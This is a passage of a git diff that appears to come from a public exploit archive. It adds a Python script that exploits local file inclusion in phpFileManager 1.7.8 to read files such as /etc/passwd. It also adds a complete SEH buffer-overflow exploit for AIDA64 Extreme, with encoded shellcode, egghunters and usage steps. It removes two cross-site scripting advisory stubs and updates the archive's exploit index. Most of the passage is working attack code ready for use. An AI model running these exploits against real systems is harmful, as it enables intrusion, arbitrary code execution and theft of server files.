+# http://target/index.php?action=3&fm_current_dir=%2Fetc%2F&filename=passwd
+
+# PoC
+
+#!/usr/bin/python
+
+import requests, sys
+
+print "\n[*] phpFileManager 1.7.8 LFI PoC By Murat Kalafatoglu"
+print "[+] usage: python " + __file__ + " http://"
+if (len(sys.argv) != 2):
+ print "[*] Usage: poc.py "
+ exit(0)
+ip_add = sys.argv[1]
+
+dr = raw_input('[+] Directory: aka /etc/\n')
+fd = raw_input('[+] File : aka passwd\n')
+
+print "Exploiting....."
+print '\n'
+
+exp = requests.get(""+ ip_add + "index.php?action=3&fm_current_dir=" + dr + "&filename=" + fd +"")
+print exp.text
\ No newline at end of file
diff --git a/exploits/windows/local/46636.py b/exploits/windows/local/46636.py
new file mode 100755
index 000000000..c057e044a
--- /dev/null
+++ b/exploits/windows/local/46636.py
@@ -0,0 +1,138 @@
+#!/usr/bin/python #
+# Exploit Title: AIDA64 Extreme 5.99.4800 - SEH Buffer Overflow (EggHunter) #
+# Date: 2019-04-01 #
+# Vendor Homepage: https://www.aida64.com #
+# Software Link: http://download.aida64.com/aida64extreme599.exe #
+# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe #
+# Exploit Author: Peyman Forouzan #
+# Tested Version: 5.99.4900 #
+# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
+# Special Thanks to my wife #
+# The program has SEH Buffer Overflow in several places.(this code show one of them) #
+# Note 1 : To optimize code, I've used a "stack pivot" that is the same in #
+# (Extreme, Engineer, Network Audit) Editions. #
+# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4800 #
+# But the stack pivots in Business Edition are different. #
+# Note 2 : All the old versions of the program that are available on the sites like soft32.com, #
+# or in https://www.aida64.com/downloads/archive #
+# have the same vulnerabily in different offsets (for example version 5.70.3800 ) #
+# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions. #
+# Steps : #
+# 1- Run python code : Aida64.py ( Three files are created ) #
+# 2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt #
+# into "Display name" --> Ok #
+# 3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt #
+# or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next #
+# --> Wait a minute --> Shellcode (Calc) open #
+#---------------------------------------------------------------------------------------------------------#
+
+#------------------------------------ EGG Shellcode Generation ---------------------------------------
+
+bufsize = 292
+
+#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
+egg = "w00tw00t"
+egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
+egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
+egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
+egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
+egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
+egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
+egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
+egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
+egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
+egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
+egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
+egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
+egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
+egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
+egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
+egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
+egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
+egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
+egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
+egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
+egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
+egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
+egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
+egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
+egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
+egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
+egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
+egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
+egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
+egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
+
+f = open ("egg.txt", "w")
+f.write(egg)
+f.close()
+
+#---------------------------------- EGG Hunter Shellcode Generation ------------------------------------
+egghunter = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"
+egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
+egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
+egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
+egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
+egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
+egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
+egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
+egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
+egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
+egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
+egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
+egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
+egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
+egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
+egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
+egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"
+
+egghunter10 = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"
+egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
+egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
+egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
+egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"
+egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"
+egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"
+egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"
+egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"
+egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"
+egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"
+egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"
+egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"
+egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"
+egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"
+egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"
+egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"
+egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"
+
+jmpback = "\xe9\xdc\xfe\xff\xff" # jmp back
+nseh = "\xeb\xf9\x90\x90" # jmp Short back
+seh = "\x40\x15\x40" # Overwrite Seh - Golden Pivot !!
+
+buffer = egghunter
+buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
+buffer += jmpback
+buffer += nseh
+buffer += seh
+print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)
+f = open ("egghunter-winxp-win7.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
+
+buffer = egghunter10
+buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
+buffer += jmpback
+buffer += nseh
+buffer += seh
+print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)
+f = open ("egghunter-win10.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/32517.html b/exploits/windows/remote/32517.html
deleted file mode 100644
index f3a55e5fc..000000000
--- a/exploits/windows/remote/32517.html
+++ /dev/null
@@ -1,11 +0,0 @@
-source: https://www.securityfocus.com/bid/31855/info
-
-Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
-
-Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
-
-
-
-
-
-
\ No newline at end of file
diff --git a/exploits/windows/remote/32518.html b/exploits/windows/remote/32518.html
deleted file mode 100644
index 68e7390d4..000000000
--- a/exploits/windows/remote/32518.html
+++ /dev/null
@@ -1,11 +0,0 @@
-source: https://www.securityfocus.com/bid/31855/info
-
-Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
-
-Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
-
-
-
-
-
-
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 192411647..e6d0f9435 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10384,6 +10384,7 @@ id,file,description,date,author,type,platform,port
46600,exploits/windows/local/46600.txt,"VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
46601,exploits/windows/local/46601.txt,"VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
46625,exploits/windows/local/46625.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)",2019-03-28,"Paolo Perego",local,windows,
+46636,exploits/windows/local/46636.py,"AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow",2019-04-02,"Peyman Forouzan",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -15678,8 +15679,6 @@ id,file,description,date,author,type,platform,port
32491,exploits/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Remote Buffer Overflow",2008-10-16,"Thomas Pollet",remote,windows,
32493,exploits/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,remote,windows,
32515,exploits/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,remote,linux,443
-32517,exploits/windows/remote/32517.html,"Mozilla Firefox 3 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",remote,windows,
-32518,exploits/windows/remote/32518.html,"Google Chrome 0.2.149 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",remote,windows,
32529,exploits/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",remote,multiple,
32530,exploits/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution",2008-11-03,"Piotr Engelking",remote,linux,
32548,exploits/linux/remote/32548.html,"Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting",2008-10-30,"Stefano Di Paola",remote,linux,
@@ -41071,3 +41070,11 @@ id,file,description,date,author,type,platform,port
46623,exploits/php/webapps/46623.txt,"BigTree 4.3.4 CMS - Multiple SQL Injection",2019-03-28,"Mehmet EMIROGLU",webapps,php,80
46624,exploits/php/webapps/46624.txt,"Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection",2019-03-28,"Ahmet Ümit BAYRAM",webapps,php,80
46629,exploits/linux/webapps/46629.txt,"CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting",2019-03-29,DKM,webapps,linux,
+46630,exploits/php/webapps/46630.txt,"Inout EasyRooms - SQL Injection",2019-04-02,"Ahmet Ümit BAYRAM",webapps,php,
+46631,exploits/php/webapps/46631.txt,"Inout RealEstate - 'city' SQL Injection",2019-04-02,"Ahmet Ümit BAYRAM",webapps,php,
+46632,exploits/php/webapps/46632.txt,"WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 - Parameter Tampering",2019-04-02,"Vikas Chaudhary",webapps,php,
+46633,exploits/hardware/webapps/46633.html,"JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery",2019-04-02,"Vikas Chaudhary",webapps,hardware,
+46634,exploits/php/webapps/46634.py,"LimeSurvey < 3.16 - Remote Code Execution",2019-04-02,q3rv0,webapps,php,
+46635,exploits/php/webapps/46635.py,"CMS Made Simple < 2.2.10 - SQL Injection",2019-04-02,"Daniele Scanu",webapps,php,
+46637,exploits/php/webapps/46637.txt,"Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting",2019-04-02,"Mr Winst0n",webapps,php,
+46638,exploits/php/webapps/46638.py,"phpFileManager 1.7.8 - Local File Inclusion",2019-04-02,"Murat Kalafatoglu",webapps,php,